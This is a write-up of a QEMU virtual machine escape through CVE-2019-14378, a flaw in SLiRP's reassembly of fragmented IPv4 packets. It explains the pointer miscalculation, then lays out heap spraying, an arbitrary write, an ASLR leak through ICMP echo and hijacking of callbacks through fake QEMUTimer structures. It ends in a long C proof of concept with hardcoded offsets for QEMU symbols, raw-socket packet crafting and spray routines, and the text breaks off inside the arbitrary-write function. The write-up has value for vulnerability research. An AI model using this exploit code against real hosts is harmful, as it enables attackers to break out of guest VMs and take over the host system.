QEMU VM Escape Vulnerability Analysis and Exploitation (CVE-2019-14378)

 

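This article describes how I exploited CVE-2019-14378 to achieve a virtual machine escape. The vulnerability is triggered when fragmented IPv4 packets are reassembled, and it was found through code auditing.

Vulnerability Analysis

QEMU (Quick Emulator) is a free, open-source hosted hypervisor (virtual machine monitor, VMM) that performs hardware virtualization, written by Fabrice Bellard and others.

QEMU emulates the CPU through dynamic binary translation and provides a set of device models, which lets it run a variety of unmodified guest operating systems. Used together with KVM (Kernel-based Virtual Machine), it can run virtual machines at near-native speed.

QEMU's internal networking is split into two parts:

  • The virtual network device presented to the guest (for example, a PCI network card).
  • The network backend that interacts with the emulated NIC (for example, by putting packets onto the host's network).

By default, QEMU creates a SLiRP user-mode network backend and an appropriate virtual network device (for example, an e1000 PCI card) for the guest.

The vulnerability was found in SLiRP's packet reassembly code.

IP Fragmentation

IP fragmentation is an Internet Protocol (IP) operation that splits a packet into smaller pieces (fragments) so that they can traverse a link whose maximum transmission unit (MTU) is smaller than the original packet size. The fragments are reassembled by the receiving host.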
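
As a rough illustration of the splitting step, the sketch below plans the fragments for a payload and a given MTU. It is not taken from QEMU or SLiRP: plan_fragments and struct frag_plan are hypothetical names, and a 20-byte IPv4 header without options is assumed. Every fragment except the last carries a multiple of 8 bytes because the header stores the offset in 8-byte units.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One planned fragment (hypothetical helper type for this sketch). */
struct frag_plan {
    uint16_t frag_off;   /* offset of this fragment's data, in 8-byte units */
    uint16_t data_len;   /* payload bytes carried by this fragment */
    int more_fragments;  /* 1 = MF set, 0 = last fragment */
};

/*
 * Split payload_len bytes into fragments for a link with the given MTU,
 * assuming a 20-byte IPv4 header without options.
 * Returns the number of fragments written to out, or 0 if out is too
 * small (or if payload_len is 0, in which case there is nothing to send).
 */
size_t plan_fragments(size_t payload_len, size_t mtu,
                      struct frag_plan *out, size_t max_out)
{
    assert(out != NULL);
    assert(mtu >= 28);             /* header plus at least 8 data bytes */
    assert(payload_len <= 65515);  /* 65535 minus the 20-byte header */

    /* Data per fragment, rounded down to a multiple of 8 bytes. */
    size_t per_frag = (mtu - 20) & ~(size_t)7;
    size_t n = 0, off = 0;

    while (off < payload_len) {
        if (n == max_out)
            return 0;
        size_t len = payload_len - off;
        if (len > per_frag)
            len = per_frag;
        out[n].frag_off = (uint16_t)(off / 8);
        out[n].data_len = (uint16_t)len;
        out[n].more_fragments = (off + len < payload_len);
        off += len;
        n++;
    }
    return n;
}
```

For a 4000-byte payload and an MTU of 1500, this yields three fragments carrying 1480, 1480 and 1040 bytes, with MF set on the first two.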

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Options                    |    Padding    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Flags: 3 bits

  • Bit 0: reserved, must be zero.
  • Bit 1 (DF): 0 = may fragment, 1 = don't fragment.
  • Bit 2 (MF): 0 = last fragment, 1 = more fragments.

Fragment Offset: 13 bits

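
The flags and the fragment offset share one 16-bit word of the header. The following sketch decodes that word once it has been converted to host byte order. The macro and function names are made up for this example (chosen so they do not clash with the IP_DF / IP_MF constants in system headers); only the bit layout comes from the header format shown here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative names for this sketch, not the system header constants. */
#define FRAG_FLAG_DF  0x4000u  /* flag bit 1: don't fragment */
#define FRAG_FLAG_MF  0x2000u  /* flag bit 2: more fragments */
#define FRAG_OFF_MASK 0x1fffu  /* low 13 bits: offset in 8-byte units */

struct frag_info {
    int dont_fragment;
    int more_fragments;
    uint32_t byte_offset;  /* fragment offset converted to bytes */
};

/* Decode the 16-bit flags/offset word (already in host byte order). */
void decode_frag_word(uint16_t word, struct frag_info *out)
{
    assert(out != NULL);
    out->dont_fragment = (word & FRAG_FLAG_DF) != 0;
    out->more_fragments = (word & FRAG_FLAG_MF) != 0;
    out->byte_offset = (uint32_t)(word & FRAG_OFF_MASK) * 8u;
}
```

A packet takes part in reassembly when either more_fragments is set or byte_offset is non-zero.
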
struct mbuf {
    /* header at beginning of each mbuf: */
    struct mbuf *m_next; /* Linked list of mbufs */
    struct mbuf *m_prev;
    struct mbuf *m_nextpkt; /* Next packet in queue/record */
    struct mbuf *m_prevpkt; /* Flags aren't used in the output queue */
    int m_flags; /* Misc flags */

    int m_size; /* Size of mbuf, from m_dat or m_ext */
    struct socket *m_so;

    char *m_data; /* Current location of data */
    int m_len; /* Amount of data in this mbuf, from m_data */

    ...

    char *m_ext;
    /* start of dynamic buffer area, must be last element */
    char m_dat[];
};

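The mbuf structure stores the received IP-layer data. It has two buffers: m_dat sits inside the structure itself, while m_ext is allocated on the heap when m_dat is too small to hold the packet.

For NAT translation, incoming packets that are fragmented must be reassembled before they are edited and retransmitted. This reassembly is done by the function ip_reass(Slirp *slirp, struct ip *ip, struct ipq *fp), where ip holds the current IP packet data and fp is the linked list (queue) holding the fragments received so far.

ip_reass does the following:
1. If this is the first fragment to arrive (fp == NULL), create a reassembly queue and insert ip into it.
2. Check whether the fragment overlaps previously received fragments and, if so, discard the overlapping data.
3. Once all fragments have been received, reassemble them, creating the header of the new IP packet by modifying the header of the first packet.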

/*
 * Take incoming datagram fragment and try to
 * reassemble it into whole datagram.  If a chain for
 * reassembly of this datagram already exists, then it
 * is given as fp; otherwise have to make a chain.
 */
static struct ip *ip_reass(Slirp *slirp, struct ip *ip, struct ipq *fp)
{

    ...
    ...

    /*
     * Reassembly is complete; concatenate fragments.
     */
    q = fp->frag_link.next;
    m = dtom(slirp, q);

    q = (struct ipasfrag *)q->ipf_next;
    while (q != (struct ipasfrag *)&fp->frag_link) {
        struct mbuf *t = dtom(slirp, q);
        q = (struct ipasfrag *)q->ipf_next;
        m_cat(m, t);
    }

    /*
     * Create header for new ip packet by
     * modifying header of first packet;
     * dequeue and discard fragment reassembly header.
     * Make header visible.
     */
    q = fp->frag_link.next;

    /*
     * If the fragments concatenated to an mbuf that's
     * bigger than the total size of the fragment, then and
     * m_ext buffer was alloced. But fp->ipq_next points to
     * the old buffer (in the mbuf), so we must point ip
     * into the new buffer.
     */
    if (m->m_flags & M_EXT) {
        int delta = (char *)q - m->m_dat;
        q = (struct ipasfrag *)(m->m_ext + delta);
    }

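The bug is in the calculation of the variable delta. The code assumes that the first fragment is never stored in an external buffer (m_ext). The computation q - m->m_dat is valid only when the packet data lives inside mbuf->m_dat (q is the linked-list structure that holds the fragment links together with the packet data). If an m_ext buffer was already allocated, q lies inside that external buffer and the computed delta is wrong.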
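
To make the faulty assumption concrete, here is a small model of the computation. It is a simplified sketch and not SLiRP code: toy_mbuf, q_inside_m_dat and offset_from_m_dat are hypothetical names, and the arithmetic is done on integers so the example stays well defined in C. The offset is only meaningful when q really points into m_dat, and this is the precondition the original code never checks.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, heavily simplified stand-in for slirp's struct mbuf. */
struct toy_mbuf {
    char *m_ext;     /* external heap buffer, or NULL */
    char m_dat[64];  /* inline buffer inside the structure */
};

/* Returns 1 if q points into m->m_dat, 0 otherwise. */
int q_inside_m_dat(const struct toy_mbuf *m, const char *q)
{
    assert(m != NULL && q != NULL);
    uintptr_t lo = (uintptr_t)m->m_dat;
    uintptr_t p = (uintptr_t)q;
    return p >= lo && p < lo + sizeof m->m_dat;
}

/*
 * The offset that the reassembly code computes as "delta".
 * It is a valid offset into the packet data only if q is inside m_dat;
 * otherwise it is just the distance between two unrelated buffers.
 */
intptr_t offset_from_m_dat(const struct toy_mbuf *m, const char *q)
{
    assert(m != NULL && q != NULL);
    return (intptr_t)((uintptr_t)q - (uintptr_t)m->m_dat);
}
```

With q 16 bytes into m_dat the offset is 16, as intended. With q 16 bytes into the external buffer, the offset instead depends on where the allocator happened to place that buffer relative to the mbuf.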

slirp/src/ip_input.c:ip_reass
    ip = fragtoip(q);
    ip->ip_len = next;
    ip->ip_tos &= ~1;
    ip->ip_src = fp->ipq_src;
    ip->ip_dst = fp->ipq_dst;

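Afterwards, the newly computed pointer q is converted to an ip structure and its fields are modified. Because delta was computed incorrectly, ip points to the wrong location, and ip_src and ip_dst can be used to write controlled data there. If the computed ip lands in an unmapped region, QEMU may also crash.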

 

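Exploitation

What we need:

  • 1. To take control of the program we need to write controlled data at a location relative to m->m_ext, which requires precise control over the heap.
  • 2. We need a memory leak to bypass ASLR.
  • 3. There are no useful function pointers on the heap for gaining code execution, so we need an arbitrary write.

Controlling the Heap

Let's look at how heap objects are allocated in slirp.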

// How much room is in the mbuf, from m_data to the end of the mbuf
#define M_ROOM(m)                                                        \
    ((m->m_flags & M_EXT) ? (((m)->m_ext + (m)->m_size) - (m)->m_data) : \
                            (((m)->m_dat + (m)->m_size) - (m)->m_data))
// How much free room there is
#define M_FREEROOM(m) (M_ROOM(m) - (m)->m_len)
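
The two macros can be read as plain functions. The sketch below restates them on a reduced structure to show the arithmetic. toy_mbuf, TOY_M_EXT, toy_room and toy_freeroom are hypothetical names for this example, and the buffer sizes are arbitrary rather than slirp's real values.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_M_EXT 0x01  /* hypothetical flag value for this sketch */

/* Reduced stand-in for struct mbuf with only the fields the macros use. */
struct toy_mbuf {
    int m_flags;
    int m_size;       /* capacity of the active buffer */
    char *m_data;     /* current start of data inside the active buffer */
    int m_len;        /* bytes of data starting at m_data */
    char *m_ext;      /* external buffer, used when TOY_M_EXT is set */
    char m_dat[256];  /* inline buffer */
};

/* Equivalent of M_ROOM: bytes from m_data to the end of the active buffer. */
ptrdiff_t toy_room(const struct toy_mbuf *m)
{
    assert(m != NULL);
    const char *base = (m->m_flags & TOY_M_EXT) ? m->m_ext : m->m_dat;
    return (base + m->m_size) - m->m_data;
}

/* Equivalent of M_FREEROOM: room that is not yet occupied by data. */
ptrdiff_t toy_freeroom(const struct toy_mbuf *m)
{
    return toy_room(m) - m->m_len;
}
```

With a 256-byte inline buffer, m_data 16 bytes in and m_len of 100, the room is 240 bytes and the free room is 140 bytes. Note that the result depends entirely on m_len being trustworthy.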

slirp/src/slirp.c:slirp_input

      m = m_get(slirp); // m_get return mbuf object, internally calls g_malloc(0x668)
      ...
      /* Note: we add 2 to align the IP header on 4 bytes,
       * and add the margin for the tcpiphdr overhead  */
      if (M_FREEROOM(m) < pkt_len + TCPIPHDR_DELTA + 2) { // TCPIPHDR_DELTA + 2 = 
          m_inc(m, pkt_len + TCPIPHDR_DELTA + 2); // allocates new m_ext buffer since m_dat is insufficient
      }
      ...

      if (proto == ETH_P_IP) {
          ip_input(m);

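m_get, m_free, m_inc, and m_cat are the functions that handle dynamic memory allocation for packets. When a new packet arrives, a new mbuf object is allocated. If m_dat is large enough to hold the packet data it is used directly; otherwise m_inc allocates a new external buffer and the data is copied into it.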

slirp/src/ip_input.c:ip_input
    /*
        * If datagram marked as having more fragments
        * or if this is not the first fragment,
        * attempt reassembly; if it succeeds, proceed.
        */
    if (ip->ip_tos & 1 || ip->ip_off) {
        ip = ip_reass(slirp, ip, fp);
        if (ip == NULL)
            return;

slirp/src/ip_input.c:ip_reass
    /*
     * If first fragment to arrive, create a reassembly queue.
     */
    if (fp == NULL) {
        struct mbuf *t = m_get(slirp);
        ...

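If the incoming packet is fragmented, a new mbuf object is used to hold the fragment queue (fp) until all fragments have arrived. When the next fragment arrives, it is added to this list.

This gives us a good primitive for allocating heap chunks of controlled size (> 0x608). For each packet an mbuf (0x670) is allocated, and if the packet is a first fragment, another mbuf is allocated (fp: the fragment queue).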

malloc(0x670)
if(pkt_len + TCPIPHDR_DELTA + 2 > 0x608)
   malloc(pkt_len + TCPIPHDR_DELTA + 2)
if(ip->ip_off & IP_MF)
   malloc(0x670)

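We can use this to spray the heap so that subsequent allocations are served from the top chunk, which gives us a predictable heap state.

Getting a Controlled Write on the Heap

Now that we can control the heap, let's see how to use the bug to overwrite something useful.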

    q = fp->frag_link.next; // Points to first fragment
    if (m->m_flags & M_EXT) {
        int delta = (char *)q - m->m_dat;
        q = (struct ipasfrag *)(m->m_ext + delta);
    }

Assume the heap is in this state:

            +------------+
            |     q      |
            +------------+
            |            |
            |            |
            |  padding   |
            |            |
            |            |
            +------------+
            |   m->m_dat |
            +------------+

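Here delta equals the negative of the padding between q and m->m_dat, and once it is added to m->m_ext we can write at that offset. Controlling this padding chunk therefore lets us control delta.

When all fragments have arrived, they are concatenated into a single mbuf object by the m_cat function.

slirp/src/mbuf.c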
void m_cat(struct mbuf *m, struct mbuf *n)
{
    /*
     * If there's no room, realloc
     */
    if (M_FREEROOM(m) < n->m_len)
        m_inc(m, m->m_len + n->m_len);

    memcpy(m->m_data + m->m_len, n->m_data, n->m_len);
    m->m_len += n->m_len;

    m_free(n);
}


slirp/src/mbuf.c
void m_inc(struct mbuf *m, int size)
{
    ...
    if (m->m_flags & M_EXT) {
        gapsize = m->m_data - m->m_ext;
        m->m_ext = g_realloc(m->m_ext, size + gapsize);
    ...
}

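m_inc calls realloc, and realloc returns the same chunk when it can satisfy the requested size in place. So even after the packet has been reassembled, we can still reach the m->m_ext buffer of the first packet. If m_ext was allocated for the first fragment, q points into this buffer.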

            +------------+
            |  target    |
            +------------+
            |            |
            |            |
            |  padding   |
            |            |
            |            |
m->m_ext -> +------------+  // q = m->m_ext + -padding  will point to target
            |     q      |  // delta = -padding
            +------------+
            |            |
            |            |
            |  padding   |
            |            |
            |            |
            +------------+
            |   m->m_dat |
            +------------+

So after the pointer calculation, q points to target.

slirp/src/ip_input.c:ip_reass
    ip = fragtoip(q);
    ...
    ip->ip_src = fp->ipq_src;
    ip->ip_dst = fp->ipq_dst;

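Since we control fp->ipq_src and fp->ipq_dst (the source and destination IP addresses of the packet), we can overwrite the contents of the target location.

Arbitrary Write

My initial goal was to overwrite the m_data field so that packet reassembly through m_cat() would give us an arbitrary write, but because of alignment and offset issues this did not seem to be exploitable.

slirp/src/mbuf.c:m_cat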
    memcpy(m->m_data + m->m_len, n->m_data, n->m_len);

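However, it is possible to overwrite the object's m_len field. Since m_cat performs no checks, we can use m_len to write data relative to m_data. This avoids the alignment problem, and we use it to overwrite the m_data of a different object to get an arbitrary write.

  • Send a packet with id 0xdead and the MF bit set to 1.
  • Send a packet with id 0xcafe and the MF bit set to 1.
  • Trigger the vulnerability to overwrite the m_len of 0xcafe so that m_data + m_len points to the m_data of 0xdead.
  • Send a packet with id 0xcafe and the MF bit set to 0 to trigger reassembly, which overwrites the m_data of 0xdead with the target address.
  • Send a packet with id 0xdead and the MF bit set to 0, which writes the contents of that packet to m_data.

Memory Leak & ASLR Bypass

We need a memory leak to bypass ASLR and PIE, and for that we need some way to get data back to the guest. It turns out that a very common service fits this description exactly: the ICMP echo request. The SLiRP gateway responds to ICMP echo requests and returns the payload of the packet unchanged.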
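
The echo behaviour itself is simple, and the sketch below shows it in isolation. This is not SLiRP's implementation: make_echo_reply and inet_checksum are hypothetical helpers written for this example, operating on a bare ICMP message (8-byte header followed by the payload). Only the type and checksum change; the payload bytes are returned as they were received.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Internet checksum (RFC 1071) over len bytes, summed as big-endian words. */
uint16_t inet_checksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    size_t i;

    assert(buf != NULL);
    for (i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)buf[i] << 8) | buf[i + 1];
    if (i < len)                    /* odd trailing byte, padded with zero */
        sum += (uint32_t)buf[i] << 8;
    while (sum >> 16)               /* fold carries back into 16 bits */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/*
 * Turn an ICMP echo request (type 8, code 0) into an echo reply (type 0)
 * in place. The payload after the 8-byte header is left untouched.
 * Returns 0 on success, -1 if msg is not an echo request.
 */
int make_echo_reply(uint8_t *msg, size_t len)
{
    assert(msg != NULL);
    if (len < 8 || msg[0] != 8 || msg[1] != 0)
        return -1;
    msg[0] = 0;                     /* ICMP_ECHOREPLY */
    msg[2] = 0;                     /* zero the checksum before recomputing */
    msg[3] = 0;
    uint16_t ck = inet_checksum(msg, len);
    msg[2] = (uint8_t)(ck >> 8);
    msg[3] = (uint8_t)(ck & 0xff);
    return 0;
}
```

Running inet_checksum over a message whose checksum field is correct yields 0, which is a convenient way to validate a reply.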

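We have an arbitrary write, but where do we write, given that no address has been leaked at this point?

We can use a partial overwrite and write the data onto the heap.

Memory leak:

  • Use the arbitrary write to create a fake ICMP header on the heap.
  • Send an ICMP request with the MF bit set to 1.
  • Partially overwrite m_data so that it points to the fake header on the heap.
  • Send a packet with the MF bit set to 0 to complete the ICMP request.
  • Receive the leaked host memory.

Arbitrary Code Execution

QEMUTimers provide a way to call a given routine (callback) after a time interval has elapsed, passing an opaque pointer to the routine.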

struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds */
    QEMUTimerList *timer_list;
    QEMUTimerCB *cb;
    void *opaque;
    QEMUTimer *next;
    int scale;
};

struct QEMUTimerList {
    QEMUClock *clock;
    QemuMutex active_timers_lock;
    QEMUTimer *active_timers;
    QLIST_ENTRY(QEMUTimerList) list;
    QEMUTimerListNotifyCB *notify_cb;
    void *notify_opaque;
    QemuEvent timers_done_ev;
};

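main_loop_tlg is an array in the bss that holds the QEMUTimerLists associated with the different timers. Each of these contains a list of QEMUTimer structures. QEMU loops over them to check whether any have expired and, if so, calls the cb function with opaque as its argument.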
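
The dispatch pattern described here can be modelled in a few lines. The sketch below is a toy version and not QEMU's timer code: the toy_ names are hypothetical, there is no locking or clock handling, and the list is assumed to be sorted by expire_time. It only shows that each expired entry results in an indirect call cb(opaque), which is why these structures matter when an attacker can write to memory.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef void toy_timer_cb(void *opaque);

/* Reduced stand-in for QEMUTimer. */
struct toy_timer {
    int64_t expire_time;     /* time at which the callback should fire */
    toy_timer_cb *cb;        /* routine to call */
    void *opaque;            /* argument passed to cb */
    struct toy_timer *next;  /* next timer, sorted by expire_time */
};

/* Reduced stand-in for QEMUTimerList. */
struct toy_timer_list {
    struct toy_timer *active_timers;
};

/*
 * Run every timer at the head of the list whose expire_time has passed.
 * Returns the number of callbacks that were invoked.
 */
int toy_run_timers(struct toy_timer_list *tl, int64_t now)
{
    int fired = 0;

    assert(tl != NULL);
    while (tl->active_timers && tl->active_timers->expire_time <= now) {
        struct toy_timer *t = tl->active_timers;
        tl->active_timers = t->next;  /* unlink before calling */
        t->next = NULL;
        assert(t->cb != NULL);
        t->cb(t->opaque);             /* the indirect call */
        fired++;
    }
    return fired;
}

/* Example callback: counts how often it was called. */
void toy_count_cb(void *opaque)
{
    ++*(int *)opaque;
}
```

With two timers expiring at 100 and 200, calling toy_run_timers at time 150 fires only the first one and leaves the second at the head of the list.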

RIP control:

  • Create a fake QEMUTimer.
  • Create a fake QEMUTimerList that contains our fake QEMUTimer.
  • Overwrite a main_loop_tlg entry with the fake QEMUTimerList.

 

Demonstration

The PoC code for the vulnerability is as follows:

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdint.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <linux/icmp.h>
#include <linux/if_packet.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <time.h>


#define die(x) do {                             \
    perror(x);                                  \
    exit(EXIT_FAILURE);                         \
  }while(0)

// * * * * * * * * * * * * * * *  Constants * * * * * * * * * * * * * * * * * *

#define SRC_ADDR "10.0.2.15"
#define DST_ADDR "10.0.2.2"

#define INTERFACE "ens3"

#define ETH_HDRLEN 14         // Ethernet header length
#define IP4_HDRLEN 20         // IPv4 header length
#define ICMP_HDRLEN 8         // ICMP header length for echo request, excludes data
#define MIN_MTU 12000

// * * * * * * * * * * * * * * * QEMU Symbol offset * * * * * * * * * * * * * * * * * *

#define SYSTEM_PLT 0x029b290
#define QEMU_CLOCK 0x10e8200
#define QEMU_TIMER_NOTIFY_CB 0x2f4bff
#define MAIN_LOOP_TLG 0x10e81e0
#define CPU_UPDATE_STATE 0x488190

// Some place in bss which is not used to craft fake structs
#define FAKE_STRUCT 0xf43360

// * * * * * * * * * * * * * * * QEMU Structs * * * * * * * * * * * * * * * * * *

struct mbuf {
    struct    mbuf *m_next;        /* Linked list of mbufs */
    struct    mbuf *m_prev;
    struct    mbuf *m_nextpkt;    /* Next packet in queue/record */
    struct    mbuf *m_prevpkt;    /* Flags aren't used in the output queue */
    int    m_flags;        /* Misc flags */

    int    m_size;            /* Size of mbuf, from m_dat or m_ext */
    struct    socket *m_so;

    char * m_data;            /* Current location of data */
    int    m_len;            /* Amount of data in this mbuf, from m_data */

    void *slirp;
    char resolution_requested;
    u_int64_t expiration_date;
    char   *m_ext;
    /* start of dynamic buffer area, must be last element */
    char  *  m_dat;
};


struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds */
    void *timer_list;
    void *cb;
    void *opaque;
    void *next;
    int scale;
};


struct QEMUTimerList {
    void * clock;
    char active_timers_lock[0x38];
    struct QEMUTimer *active_timers;
    struct QEMUTimerList *le_next;   /* next element */                      
    struct QEMUTimerList **le_prev;  /* address of previous next element */  
    void *notify_cb;
    void *notify_opaque;

    /* lightweight method to mark the end of timerlist's running */
    size_t timers_done_ev;
};



// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *

int raw_socket;
int recv_socket;
int spray_id;
int idx;
char mac[6];

void * code_leak;
void * heap_leak;

void *Malloc(size_t size) {
  void * ptr = calloc(size,1);
  if (!ptr) {
    die("malloc() failed to allocate");
  }
  return ptr;
}

unsigned short in_cksum(unsigned short *ptr,int nbytes) {

    register long sum;          /* assumes long == 32 bits */
    u_short oddbyte;
    register u_short answer;    /* assumes u_short == 16 bits */

    /*
     * Our algorithm is simple, using a 32-bit accumulator (sum),
     * we add sequential 16-bit words to it, and at the end, fold back
     * all the carry bits from the top 16 bits into the lower 16 bits.
     */

    sum = 0;
    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nbytes == 1) {
        oddbyte = 0;            /* make sure top half is zero */
        *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
        sum += oddbyte;
    }

    /*
     * Add back carry outs from top 16 bits to low 16 bits.
     */

    sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
    sum += (sum >> 16);                     /* add carry */
    answer = ~sum;          /* ones-complement, then truncate to 16 bits */
    return(answer);
}

void hex_dump(char *desc, void *addr, int len) 
{
    int i;
    unsigned char buff[17];
    unsigned char *pc = (unsigned char*)addr;
    if (desc != NULL)
        printf ("%s:\n", desc);
    for (i = 0; i < len; i++) {
        if ((i % 16) == 0) {
            if (i != 0)
                printf("  %s\n", buff);
            printf("  %04x ", i);
        }
        printf(" %02x", pc[i]);
        if ((pc[i] < 0x20) || (pc[i] > 0x7e)) {
            buff[i % 16] = '.';
        } else {
            buff[i % 16] = pc[i];
        }
        buff[(i % 16) + 1] = '\0';
    }
    while ((i % 16) != 0) {
        printf("   ");
        i++;
    }
    printf("  %s\n", buff);
}

char * ethernet_header(char * eth_hdr){

    /* src MAC :  52:54:00:12:34:56 */
    memcpy(&eth_hdr[6],mac,6);

    // Next is ethernet type code (ETH_P_IP for IPv4).
    // http://www.iana.org/assignments/ethernet-numbers
    eth_hdr[12] = ETH_P_IP / 256;
    eth_hdr[13] = ETH_P_IP % 256;
    return eth_hdr;
}

void ip_header(struct  iphdr * ip ,u_int32_t src_addr,u_int32_t dst_addr,u_int16_t payload_len,
                         u_int8_t protocol,u_int16_t id,uint16_t frag_off){

  /* rfc791 */
  ip->ihl = IP4_HDRLEN / sizeof (uint32_t);
  ip->version = 4;
  ip->tos = 0x0;
  ip->tot_len = htons(IP4_HDRLEN + payload_len);
  ip->id = htons(id);
  ip->ttl = 64;
  ip->frag_off = htons(frag_off);
  ip->protocol = protocol;
  ip->saddr = src_addr;
  ip->daddr = dst_addr;
  ip->check = in_cksum((unsigned short *)ip,IP4_HDRLEN);
}

void icmp_header(struct icmphdr *icmp, char *data, size_t size) {

  /* rfc792 */
  icmp->type = ICMP_ECHO;
  icmp->code = 0;
  icmp->un.echo.id = htons(0);
  icmp->un.echo.sequence = htons(0);
  if (data) {
    char * payload = (char * )icmp+ ICMP_HDRLEN;
    memcpy(payload, data, size);
  }

  icmp->checksum = in_cksum((unsigned short *)icmp, ICMP_HDRLEN + size);

}

void send_pkt(char *frame, u_int32_t frame_length) {

  struct sockaddr_ll sock;
  sock.sll_family = AF_PACKET;
  sock.sll_ifindex = idx;
  sock.sll_halen = 6;
  memcpy (sock.sll_addr, mac, 6 * sizeof (uint8_t));

  if(sendto(raw_socket,frame,frame_length,0x0,(struct sockaddr *)&sock,
            sizeof(sock))<0)
    die("sendto()");
}

void send_ip4(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {

  u_int32_t src_addr, dst_addr;
  src_addr = inet_addr(SRC_ADDR);
  dst_addr = inet_addr(DST_ADDR);

  char * pkt = Malloc(IP_MAXPACKET);
  struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);

  ethernet_header(pkt);
  u_int16_t payload_len = size;
  ip_header(ip,src_addr,dst_addr,payload_len,IPPROTO_ICMP,id,frag_off);

  if(data) {
    char * payload = (char *)pkt + ETH_HDRLEN + IP4_HDRLEN;
    memcpy(payload, data, payload_len);
  }

  u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + payload_len;
  send_pkt(pkt,frame_length);
  free(pkt);
}

void send_icmp(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {

  char * pkt = Malloc(IP_MAXPACKET);
  struct icmphdr * icmp = (struct icmphdr * )(pkt);

  if(!data)
      data = Malloc(size);
  icmp_header(icmp,data,size);

  u_int32_t len =  ICMP_HDRLEN + size;
  send_ip4(id,len,pkt,frag_off);
  free(pkt);
 }

// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *

void initialize() {
   int sd;
   struct ifreq ifr;
   char interface[40];
   int mtu;

   srand(time(NULL));
   strcpy (interface, INTERFACE);

  // Submit request for a socket descriptor to look up interface.
  if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    die("socket() failed to get socket descriptor for using ioctl()");
  }
    // Use ioctl() to get interface maximum transmission unit (MTU).
  memset (&ifr, 0, sizeof (ifr));
  strcpy (ifr.ifr_name, interface);
  if (ioctl (sd, SIOCGIFMTU, &ifr) < 0) {
    die("ioctl() failed to get MTU ");
  }
  mtu = ifr.ifr_mtu;
  printf ("MTU of interface %s : %i\n", interface, mtu);
  if (mtu < MIN_MTU) {
    printf("Run\n$ ip link set dev %s mtu 12000\n",interface);
    die("");
  }

  // Use ioctl() to look up interface name and get its MAC address.
  memset (&ifr, 0, sizeof (ifr));
  snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
  if (ioctl (sd, SIOCGIFHWADDR, &ifr) < 0) {
    die("ioctl() failed to get source MAC address ");
  }
  memcpy (mac, ifr.ifr_hwaddr.sa_data, 6 * sizeof (uint8_t));
  printf ("MAC %s :", interface);
  for (int i=0; i<5; i++) {
    printf ("%02x:", (unsigned char)mac[i]);
  }
  printf ("%02x\n", (unsigned char)mac[5]);

  // Use ioctl() to look up interface index which we will use to
  // bind socket descriptor sd to specified interface with setsockopt() since
  // none of the other arguments of sendto() specify which interface to use.
  memset (&ifr, 0, sizeof (ifr));
  snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
  if (ioctl (sd, SIOCGIFINDEX, &ifr) < 0) {
    die("ioctl() failed to find interface ");
  }

  close (sd);
  printf ("Index for interface %s : %i\n", interface, ifr.ifr_ifindex);
  idx = ifr.ifr_ifindex;

  if((raw_socket = socket(PF_PACKET, SOCK_RAW, htons (ETH_P_ALL)))==-1)
      die("socket() failed to obtain raw socket");


  /* Bind socket to interface index. */
  if (setsockopt (raw_socket, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof (ifr)) < 0) {
    die("setsockopt() failed to bind to interface ");
  }

  printf("Initialized socket descriptors\n");
}


void spray(uint32_t size, u_int32_t count) {
  printf("Spraying 0x%x x ICMP[0x%x]\n",count,size);
   int s;
   u_int16_t frag_off;
   char * data;

   for (int i = 0; i < count; i++) {
     send_icmp(spray_id + i,size, NULL, IP_MF);
   }
}

void arbitrary_write(void *addr, size_t addrlen, char *payload, size_t size,
                     size_t spray_count) {

    spray(0x8, spray_count);


    size_t id = spray_id + spray_count;
    // Target
    size_t target_id = id++;
